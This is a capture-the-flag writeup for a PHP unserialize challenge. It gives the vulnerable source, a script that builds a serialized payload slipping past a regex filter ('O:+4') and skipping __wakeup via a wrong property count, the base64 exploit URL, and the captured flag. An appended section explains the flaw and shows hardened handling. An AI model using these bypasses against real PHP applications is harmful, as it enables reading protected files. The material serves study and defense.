攻防世界 (adworld) - Web_php_unserialize

Web_php_unserialize

Points: 2  Coins: 2

Best writeup by mortals

Difficulty: 2

Category: Web

Writeups: 55

Solved by: 11706

Source: CTF

Description: none

Challenge instance:

http://61.147.171.105:60401


<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
if (isset($_GET['var'])) { 
    $var = base64_decode($_GET['var']); 
    if (preg_match('/[oc]:\d+:/i', $var)) { 
        die('stop hacking!'); 
    } else {
        @unserialize($var); 
    } 
} else { 
    highlight_file("index.php"); 
} 
?>
<!-- http://61.147.171.105:60401/ -->

<?php 
class Demo { 
    private $file = 'index.php';
    public function __construct($file) { 
        $this->file = $file; 
    }
    function __destruct() { 
        echo @highlight_file($this->file, true); 
    }
    function __wakeup() { 
        if ($this->file != 'index.php') { 
            //the secret is in the fl4g.php
            $this->file = 'index.php'; 
        } 
    } 
}
// The request handler from index.php is kept here commented out;
// only the class definition is needed to build the payload locally.
// if (isset($_GET['var'])) { 
//     $var = base64_decode($_GET['var']); 
//     if (preg_match('/[oc]:\d+:/i', $var)) { 
//         die('stop hacking!'); 
//     } else {
//         @unserialize($var); 
//     } 
// } else { 
//     highlight_file("index.php"); 
// } 

// Serialize a Demo that points at fl4g.php, then patch the string by hand.
$obj=new Demo("fl4g.php");
$str=serialize($obj);
echo $str,PHP_EOL;
// 'O:+4' is still accepted by unserialize() but is not matched by /[oc]:\d+:/i
$str=str_replace('O:4','O:+4',$str);
// Declaring 2 properties while only 1 is present skips __wakeup() on the
// PHP version behind the challenge, so $file stays 'fl4g.php' for __destruct()
$str=str_replace(':1:',':2:',$str);
echo $str;
echo base64_encode($str);
?>

                                                      
┌──(kwkl㉿kwkl)-[~/HODL]
└─$ cd adworld/web/unsel 
                                                      
┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/unsel]
└─$ ls     
1.php
                                                      
┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/unsel]
└─$ php 1.php 
<!-- http://61.147.171.105:60401/ -->

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
                                                      
┌──(kwkl㉿kwkl)-[~/HODL/adworld/web/unsel]
└─$ php 1.php
<!-- http://61.147.171.105:60401/ -->

O:4:"Demo":1:{s:10:"Demofile";s:8:"fl4g.php";}
O:+4:"Demo":2:{s:10:"Demofile";s:8:"fl4g.php";}TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

Solution: request the challenge page with the base64 payload in the var parameter.

http://61.147.171.105:60401/?var=TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

<?php
$flag="ctf{b17bd4c7-34c9-4526-8fa8-a0794a197013}";
?>
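To show why the two tricks work and how the handler should have been written, here is an added PHP example that is not part of the original writeup or the challenge. It keeps the challenge's Demo class but replaces the file read with a print so it runs anywhere, uses the page's own payload (note that the `Demofile` shown in the terminal output above is really `\0Demo\0file`, the private-property name mangling whose null bytes the terminal does not display), and assumes PHP 7.0 or later for the `allowed_classes` option of `unserialize()`. The function names are chosen for this example only.

```php
<?php
// Added example, not from the original writeup: the challenge's Demo class with the
// file read replaced by a print, next to a hardened version of the request handler.

class Demo {
    private $file = 'index.php';
    public function __construct($file) { $this->file = $file; }
    function __destruct() { echo "[__destruct] would highlight {$this->file}\n"; }
    function __wakeup() {
        echo "[__wakeup] ran\n";
        if ($this->file != 'index.php') { $this->file = 'index.php'; }
    }
}

// The payload the writeup sends in ?var=, i.e. O:+4:"Demo":2:{s:10:"\0Demo\0file";s:8:"fl4g.php";}
$payload = base64_decode('TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==');

// The challenge's filter: it expects a digit right after "O:"/"C:", but unserialize()
// also accepts a signed length such as "O:+4:", so the object token gets through.
function weak_filter(string $s): bool {
    return (bool) preg_match('/[oc]:\d+:/i', $s);
}

// Minimal regex fix: allow an optional sign before the length.
function strict_filter(string $s): bool {
    return (bool) preg_match('/[oc]:[+-]?\d+:/i', $s);
}

// Structural fix (PHP >= 7.0): forbid object instantiation outright. Any object token
// becomes __PHP_Incomplete_Class, so neither __wakeup() nor __destruct() of Demo can
// run regardless of what a regex might miss.
function safe_unserialize(string $s) {
    return @unserialize($s, ['allowed_classes' => false]);
}

echo "weak filter blocks payload:   ", weak_filter($payload)   ? "yes" : "no", "\n"; // no
echo "strict filter blocks payload: ", strict_filter($payload) ? "yes" : "no", "\n"; // yes

// The same object token with the correct property count, so it parses cleanly.
$wellFormed = 'O:4:"Demo":1:{s:10:"' . "\0Demo\0file" . '";s:8:"fl4g.php";}';
$obj = safe_unserialize($wellFormed);
echo "allowed_classes=false gives:  ", is_object($obj) ? get_class($obj) : var_export($obj, true), "\n";

// The writeup's ":2:" trick relies on PHP < 5.6.25 / < 7.0.10 still calling __destruct()
// on an object whose __wakeup() was skipped because the declared property count did
// not match. Patched interpreters return false here and free the half-built object
// without running __destruct(); on an unpatched one "[__destruct] would highlight
// fl4g.php" would be printed with no "[__wakeup] ran" before it.
$r = @unserialize($payload);
echo "unserialize of the payload returned: ", var_export($r, true), "\n";
```

The regex fix only closes the one spelling the writeup used; the `allowed_classes => false` form is the real mitigation because it removes the magic-method trigger entirely, and when objects genuinely must be restored from user input the class list should be an explicit allowlist rather than `true`.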